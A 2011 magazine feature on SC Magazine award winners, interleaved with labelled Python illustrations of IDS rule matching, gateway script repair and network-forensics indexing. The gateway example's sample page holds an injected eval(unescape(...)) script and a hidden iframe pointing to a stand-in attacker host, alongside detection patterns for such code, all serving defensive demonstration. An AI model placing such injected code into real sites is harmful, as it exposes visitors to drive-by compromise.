Feature

Looking a little closer at the winners of the SC Magazine Awards

2011 marks the third year SC Magazine has incorporated a number of technology awards into the AusCERT gala conference and presentation. The awards receive nominations from across the industry, and a panel of thirteen highly experienced security professionals decides the winners.

Vendor of the Year  -  Sourcefire

Sourcefire is a vendor of IPS, IDS, anti-virus and anti-malware products, and also runs a vulnerability research team. As the corporate sponsor of the open-source Snort IDS and the multi-platform ClamAV anti-malware engine, Sourcefire has a pedigree behind its commercial IPS product line, which is recognised as a best-of-breed, high-throughput, low-latency solution.

Recently, the Sourcefire 3D8260 IPS sensor was confirmed by NSS Labs to deliver up to 27.6Gbps of real-world throughput while maintaining good energy efficiency and a low price per protected Mbps.

Snort, the open-source IDS maintained by Sourcefire, uses a rule-driven language that combines signature, protocol and anomaly-based inspection in a single rule. ClamAV is a lightweight, open-source anti-malware engine with a regularly updated signature database; it has been available for non-Windows platforms for many years and is packaged for popular Linux distributions such as Ubuntu, Fedora and openSUSE.
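To make the "three inspection methods in one rule" point concrete, the following Python is an added illustration (not Snort or Sourcefire code) of how a Snort-style rule header supplies the protocol check, a `content:` option supplies the signature, and a `threshold:` option supplies a rate-based anomaly check. It parses only the small subset of rule syntax used in the constructed `SAMPLE_RULES`, and the packets in `SAMPLE_PACKETS` are constructed; real Snort additionally does stream reassembly, preprocessing and fast pattern matching, none of which is modelled here.

```python
"""Toy rule engine mirroring how a Snort-style rule combines three checks:
protocol (header), signature (content:) and an anomaly-style rate check
(threshold:). Added illustration, not Snort or Sourcefire code; it handles
only the rule subset used in SAMPLE_RULES below."""
import re
from collections import defaultdict

RULE_HDR = re.compile(
    r"^(?P<action>alert|log)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)"
    r"\s+->\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s+\((?P<opts>.*)\)\s*$")


def parse_rule(text):
    """Split a rule into header fields plus an options dict (key -> value).
    Real Snort copes with ';' inside quoted content, modifiers etc.; this does not."""
    m = RULE_HDR.match(text.strip())
    if not m:
        raise ValueError("unparseable rule: " + text)
    rule = m.groupdict()
    opts = {}
    for opt in rule.pop("opts").split(";"):
        if opt.strip():
            key, _, val = opt.strip().partition(":")
            opts[key.strip()] = val.strip().strip('"')
    rule["opts"] = opts
    return rule


def _hdr_match(pattern, value):
    return pattern == "any" or pattern == str(value)


class Engine:
    def __init__(self, rules):
        self.rules = [parse_rule(r) for r in rules]
        self.seen = defaultdict(list)  # (sid, src) -> timestamps of recent matches

    def _threshold_ok(self, rule, pkt):
        """'threshold:type threshold, track by_src, count N, seconds S' fires
        once every N matching packets from one source within S seconds."""
        spec = rule["opts"].get("threshold")
        if spec is None:
            return True  # no threshold option: every match alerts
        f = dict(p.strip().split(" ", 1) for p in spec.split(","))
        count, seconds = int(f["count"]), int(f["seconds"])
        key = (rule["opts"]["sid"], pkt["src"])  # only 'track by_src' is modelled
        window = [t for t in self.seen[key] if pkt["ts"] - t < seconds] + [pkt["ts"]]
        if len(window) >= count:
            self.seen[key] = []  # reset after firing
            return True
        self.seen[key] = window
        return False

    def inspect(self, pkt):
        """Return the msg of every rule that fires on this packet."""
        alerts = []
        for rule in self.rules:
            o = rule["opts"]
            if rule["proto"] != pkt["proto"]:                       # protocol check
                continue
            if not all(_hdr_match(rule[k], pkt[k]) for k in ("src", "sport", "dst", "dport")):
                continue
            if "content" in o and o["content"].encode() not in pkt["payload"]:  # signature
                continue
            if self._threshold_ok(rule, pkt):                        # rate/anomaly check
                alerts.append(o["msg"])
        return alerts


# Constructed rules: one pure signature, one pure rate check (no content:).
SAMPLE_RULES = [
    'alert tcp any any -> any 80 (msg:"WEB-MISC /etc/passwd access"; content:"/etc/passwd"; sid:1000001;)',
    'alert tcp any any -> any 22 (msg:"SSH connection flood from one source"; '
    'threshold:type threshold, track by_src, count 3, seconds 60; sid:1000002;)',
]

# Constructed packets: ts is seconds; the udp packet carries the signature on
# the right port but the wrong protocol, so it must not alert.
SAMPLE_PACKETS = [
    dict(ts=0, proto="tcp", src="10.0.0.5", sport=40001, dst="192.168.1.10", dport=80, payload=b"GET /index.html HTTP/1.1\r\n"),
    dict(ts=1, proto="tcp", src="10.0.0.5", sport=40002, dst="192.168.1.10", dport=80, payload=b"GET /cgi-bin/../../etc/passwd HTTP/1.1\r\n"),
    dict(ts=2, proto="udp", src="10.0.0.5", sport=40003, dst="192.168.1.10", dport=80, payload=b"/etc/passwd"),
    dict(ts=10, proto="tcp", src="10.0.0.9", sport=50001, dst="192.168.1.20", dport=22, payload=b"SSH-2.0-x"),
    dict(ts=11, proto="tcp", src="10.0.0.9", sport=50002, dst="192.168.1.20", dport=22, payload=b"SSH-2.0-x"),
    dict(ts=12, proto="tcp", src="10.0.0.9", sport=50003, dst="192.168.1.20", dport=22, payload=b"SSH-2.0-x"),
]


def run(rules=SAMPLE_RULES, packets=SAMPLE_PACKETS):
    """Feed packets through the engine in order; return (ts, msg) alerts."""
    eng = Engine(rules)
    return [(p["ts"], a) for p in packets for a in eng.inspect(p)]


if __name__ == "__main__":
    for ts, msg in run():
        print(ts, msg)
```

Only the second HTTP request and the third SSH connection from 10.0.0.9 produce alerts: the UDP packet carries the signature string but fails the protocol check, and the first two SSH connections stay below the threshold count.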

Product or Service of the Year  -  Imperva SecureSphere

The SecureSphere suite offers file activity monitoring and database activity monitoring and includes a web application firewall. Recently Imperva has introduced products to address cloud security and content control.

Imperva Cloud WAF is a cloud-based web application firewall service for small to mid-sized enterprises that need to achieve PCI compliance, avoid having their site blacklisted, protect against web application attacks and improve website performance. The Imperva Cloud WAF service includes around-the-clock monitoring, tuning, reporting and incident response.

[Figure: Imperva SecureSphere architecture]

A dedicated management platform provides central administration, configuration and monitoring of deployed SecureSphere services, and SecureSphere itself can be implemented as redundant, scalable hardware or as virtual appliances. A lightweight host agent is available which acts as an event collector and can optionally lock out or quarantine a user when a security violation occurs.

Named to the Wall Street Journal's Next Big Thing list, Imperva has also attained ICSA Labs web application firewall certification, which is relevant to the PCI DSS requirement (6.6) for protecting public-facing web applications.

Innovation Award  -  VMInformer Professional

VMInformer moved to Australia from its UK start-up roots early in the company's history and is now considered a local, with its headquarters in Sydney. It provides a security assessment tool set for virtualised environments; benefits include automation, centralised visibility of key security, network and storage configuration settings, and identification of performance issues.

VMInformer version 2.6 has recently been released with a number of enhancements to the existing platform. By providing visibility into the security posture of a virtual environment, it lets organisations using virtual computing demonstrate that security policies and procedures are enforced regardless of platform or virtualisation implementation.

“This version incorporates some significant improvements which our larger customers such as hosting providers and multi-national enterprises have requested” said John Reeman, CTO and founder. “The development team have improved the core functionality of rapidly providing visibility across thousands of virtualization settings with better drill-down and zoom features which makes it easier to investigate larger storage arrays used in the largest virtualized infrastructures.”

Protector Award  -  M86 Security Secure Web Gateway

The M86 Security Secure Web Gateway claims to be the industry's fastest and most accurate Web 2.0 gateway, and it is certainly not short on features. It offers traditional signature-based anti-malware scanning and filters for over 90 applications, and also implements granular social media controls and data loss prevention, with integrated AD or LDAP authentication, multiple deployment options and a single reporting interface.

The ability to provide centralised reporting regardless of deployment model is a strong feature: many vendors struggle to bring reports together from a mixed deployment of hardware appliances, virtual appliances and a cloud offering.

M86 Security's latest Threat Predictions report explained why M86 is concentrating so keenly on Web 2.0. "From recent cross-site scripting (XSS) and cross-site request forgery attacks to the 'likejacking' attacks, increase in spam and sensationalised headline applications on Facebook, cybercriminals are constantly tooling and retooling, finding ways to exploit the social networks."

“This is because there is more success and payoff in assuming the identity of someone a user knows than in pretending to be a Nigerian Prince.”

M86 has also recently announced its own patented Real-time Code Analysis behaviour inspection technology, which scans content at the gateway for the operations, parameters, script manipulations and other exploitation techniques it contains, in order to determine whether that active content will perform a malicious action when loaded in the browser.

According to M86, its Dynamic Web Repair technology can even remove malicious content from a compromised site and serve a repaired page to the user, rather than simply blocking the entire page.
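The two ideas above (judge what active content will do, then strip only the offending element rather than block the page) can be shown with a small Python gateway filter. This is an added illustration and not M86's technology: the detection rules are hand-written heuristics for the two most common drive-by shapes (a decode routine feeding an execution sink, and a zero-sized or hidden iframe), and the sample page is constructed. A real gateway would also reason about runtime behaviour rather than just source patterns.

```python
"""Toy gateway-side inspection and repair of active content. Added
illustration, not M86 code: hand-written heuristics flag scripts with a
decode-then-execute shape and hidden iframes, then only those elements
are removed so the rest of the page reaches the user intact."""
import re

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>.*?</iframe\s*>|<iframe\b[^>]*/?>", re.I | re.S)

# A decoder feeding an execution sink in one script is the classic injected
# drive-by shape, e.g. eval(unescape('%3Cscript...')). Pure heuristic.
DECODERS = ("unescape(", "atob(", "String.fromCharCode(")
SINKS = ("eval(", "document.write(", "setTimeout(", "Function(")
ENCODED_RUN = re.compile(r"(?:%[0-9a-fA-F]{2}){20,}|(?:\\x[0-9a-fA-F]{2}){20,}")


def script_is_suspicious(body):
    """True if the script decodes-then-executes or carries a long encoded blob."""
    has_decoder = any(d in body for d in DECODERS)
    has_sink = any(s in body for s in SINKS)
    return (has_decoder and has_sink) or ENCODED_RUN.search(body) is not None


def iframe_is_hidden(tag):
    """Zero-sized or display:none frames are the usual injected-iframe trick."""
    attrs = tag.lower()
    zero = re.search(r"""(width|height)\s*=\s*["']?0(?:px)?["'\s>/]""", attrs)
    squashed = attrs.replace(" ", "")
    return zero is not None or "display:none" in squashed or "visibility:hidden" in squashed


def repair_page(html):
    """Return (repaired_html, findings). Only flagged elements are replaced,
    each by an HTML comment so the repair is visible in the page source."""
    findings = []

    def drop_script(m):
        if script_is_suspicious(m.group(1)):
            findings.append(("script", m.group(1)[:40]))
            return "<!-- gateway removed suspicious script -->"
        return m.group(0)

    def drop_iframe(m):
        if iframe_is_hidden(m.group(0)):
            findings.append(("iframe", m.group(0)[:40]))
            return "<!-- gateway removed hidden iframe -->"
        return m.group(0)

    repaired = SCRIPT_RE.sub(drop_script, html)
    repaired = IFRAME_RE.sub(drop_iframe, repaired)
    return repaired, findings


# Constructed sample: a legitimate shop page with two injected elements.
SAMPLE_PAGE = """<html><head><title>Shop</title>
<script>function addToCart(id) { cart.push(id); }</script>
</head><body>
<h1>Welcome</h1>
<iframe src="https://partner.example/widget" width="300" height="200"></iframe>
<script>var p="%3Cscript%20src%3D%22http%3A%2F%2Fbad.example%2Fa.js%22%3E";eval(unescape(p));</script>
<iframe src="http://bad.example/x" width="0" height="0" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    page, found = repair_page(SAMPLE_PAGE)
    print(found)
    print(page)
```

Running it leaves the `addToCart` script and the visible partner iframe in place and replaces the `eval(unescape(...))` script and the zero-sized iframe with comments. Regex-based HTML handling is adequate for a demonstration but not for production, where a proper HTML parser and script analysis are needed.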

Gatekeeper Award  -  NetWitness NextGen for forensics

Recently acquired by EMC and now operating as a line of business within RSA, NetWitness is a network monitoring platform that gives enterprises a precise and actionable understanding of everything happening on the network. Information from the platform gives administrators data on insider threats, zero-day exploits and targeted malware, advanced persistent threats, fraud, espionage and data leakage, and supports continuous monitoring of security controls.

Canberra-based NetWitness sales director Michael Hodge tells an impressive story, claiming the platform records "everything" through an architecture with three core components: Decoder, Concentrator and Broker. While there are many competitors in this space, it is the way NetWitness collects, analyses and brokers the captured data that makes it stand out.

Decoders collect and normalise network data and work with Concentrators, which sort, aggregate and classify that data using a complex but logical metadata framework. In turn, a Broker communicates with the Concentrators to run queries across the data, which is then made available to other NetWitness applications and to a richly featured API.

With this infrastructure, hundreds of Decoders can be deployed across a large network, feeding tens of Concentrators that in turn serve a single Broker. The ability for network forensics staff to drill into even the smallest event and understand how it occurred is exceptionally powerful.
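The following Python models the three tiers described above so the division of labour is visible: Decoders turn raw capture into flat metadata, Concentrators hold an inverted index over that metadata, and one Broker fans a query out to every Concentrator and merges the results, which is what lets an analyst go from a fleet-wide pivot (sessions per destination) down to a single session on a single Decoder. This is an added illustration, not NetWitness code; the one-line capture format, the metadata key names and the sample records are all constructed for the example.

```python
"""Toy model of a Decoder -> Concentrator -> Broker capture architecture.
Added illustration, not NetWitness code; the record format and metadata
key names are assumptions made for the example."""
import re
from collections import defaultdict

# Constructed raw capture summaries, one session per line, as two Decoders
# on different network segments might see them.
RAW_DC1 = """\
2011-05-18T09:00:01 tcp 10.1.1.5:51000 -> 203.0.113.7:80 bytes=812 http host=update.example.invalid
2011-05-18T09:00:05 tcp 10.1.1.5:51001 -> 203.0.113.7:443 bytes=4096 ssl
2011-05-18T09:00:09 udp 10.1.1.8:5353 -> 224.0.0.251:5353 bytes=120 mdns
"""
RAW_DC2 = """\
2011-05-18T09:00:02 tcp 10.2.2.9:42000 -> 203.0.113.7:80 bytes=650 http host=update.example.invalid
2011-05-18T09:00:12 tcp 10.2.2.9:42001 -> 198.51.100.4:22 bytes=230000 ssh
"""

LINE = re.compile(
    r"(?P<time>\S+) (?P<proto>\w+) (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) bytes=(?P<size>\d+) (?P<service>\w+)"
    r"(?: host=(?P<host>\S+))?")


class Decoder:
    """Captures raw data and normalises each session into flat metadata."""
    def __init__(self, name, raw):
        self.name = name
        self.sessions = []
        for n, line in enumerate(raw.splitlines(), 1):
            m = LINE.match(line)
            if not m:
                continue  # a real Decoder would still keep the raw bytes
            meta = {k: v for k, v in m.groupdict().items() if v is not None}
            meta["size"] = int(meta["size"])
            meta["session.id"] = f"{name}:{n}"
            meta["decoder"] = name
            self.sessions.append(meta)


class Concentrator:
    """Inverted index over Decoder metadata so queries never scan raw capture."""
    def __init__(self, name, decoders):
        self.name = name
        self.sessions = {}
        self.index = defaultdict(set)  # (key, value) -> {session ids}
        for d in decoders:
            for s in d.sessions:
                self.sessions[s["session.id"]] = s
                for k, v in s.items():
                    self.index[(k, str(v))].add(s["session.id"])

    def query(self, where):
        """where = {key: value, ...}, ANDed equality terms. Values are
        compared as strings, so ports may be given as 80 or "80"."""
        if not where:
            ids = set(self.sessions)
        else:
            ids = None
            for k, v in where.items():
                hits = self.index.get((k, str(v)), set())
                ids = hits if ids is None else ids & hits
        return [self.sessions[i] for i in sorted(ids)]


class Broker:
    """Fans a query out to every Concentrator and merges the answers."""
    def __init__(self, concentrators):
        self.concentrators = concentrators

    def query(self, where=None):
        out = [s for c in self.concentrators for s in c.query(where or {})]
        return sorted(out, key=lambda s: s["time"])

    def count_by(self, key, where=None):
        """Fleet-wide pivot (e.g. sessions per destination): the first step
        of a drill-down before narrowing to individual sessions."""
        counts = defaultdict(int)
        for s in self.query(where):
            counts[str(s.get(key))] += 1
        return dict(counts)


def build_demo():
    """Two Decoders, one Concentrator each, one Broker over both."""
    dc1, dc2 = Decoder("dc1", RAW_DC1), Decoder("dc2", RAW_DC2)
    return Broker([Concentrator("cn1", [dc1]), Concentrator("cn2", [dc2])])


if __name__ == "__main__":
    broker = build_demo()
    print(broker.count_by("dst"))
    for s in broker.query({"service": "http", "host": "update.example.invalid"}):
        print(s["session.id"], s["decoder"], s["src"], "->", s["dst"])
```

The drill-down query for HTTP sessions to `update.example.invalid` returns one session from each Decoder, merged and time-ordered by the Broker, without either Concentrator knowing about the other. Scaling the real architecture to hundreds of Decoders and tens of Concentrators is then a matter of adding nodes behind the same Broker interface.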

[Figure: NetWitness NextGen architecture]

“This pervasive and accurate visibility helps organizations resolve a wide variety of the most challenging cyber-security problems, such as insider threats and fraud, electronic crime, nation-sponsored attacks and data leakage problems,” says Chief Security Officer Eddie Schwartz.

Schwartz boasts a 25-year background in information security and privacy, specialising in the financial services and federal government sectors. He has also worked as a technology management consultant for several large commercial and U.S. government entities, including the U.S. Departments of Justice and State.

SME  -  McAfee endpoint protection

McAfee's endpoint protection suite is regarded as one of the fastest, most accurate and most operating-system-agnostic anti-virus/anti-malware offerings available. Protecting Windows, Mac and Linux systems as well as Android and Windows Mobile devices, McAfee combines signature-based detection with behavioural and reputation-based techniques to secure systems and data against sophisticated malware, botnets and zero-day attacks, as well as unauthorised applications.

McAfee's endpoint focus appears to be drifting away from anti-virus, and worldwide CTO George Kurtz explains why.

[Image: McAfee WaveSecure]

“Over the past years McAfee has transformed from a business focused on antivirus software to a company focused on cybersecurity as a whole. We have long moved beyond the PC and beyond simple antivirus to secure myriad endpoint devices, networks as well as the cloud. And as we have grown, with each passing year endpoint antivirus has become a smaller and smaller percentage of our overall business.”

Pamela Warren, McAfee's Global Cybercrime Strategist and Director of Public Sector and Critical Infrastructure Initiatives, clearly shares Kurtz's strategy of protecting endpoints from malware and data loss. During her AusCERT presentation Warren proposed that by 2020 there would be 50 billion IP-connected devices, 2 trillion online transactions and 4 billion people on the Internet, making compromised endpoints a large market for both the good guys and the cyber criminals.

Kurtz concluded “The exponential growth of cybercrime hasn’t been slowed in any way by the advent of newer devices – it has only accelerated as the number of potential targets has proliferated. As part of Intel we will innovate further and provide additional technologies for the world beyond the PC. We expect a 50-fold increase in connected devices over the coming decade, posing a formidable security and management challenge. We’re ready for that challenge and the opportunity.”

This was first published in May 2011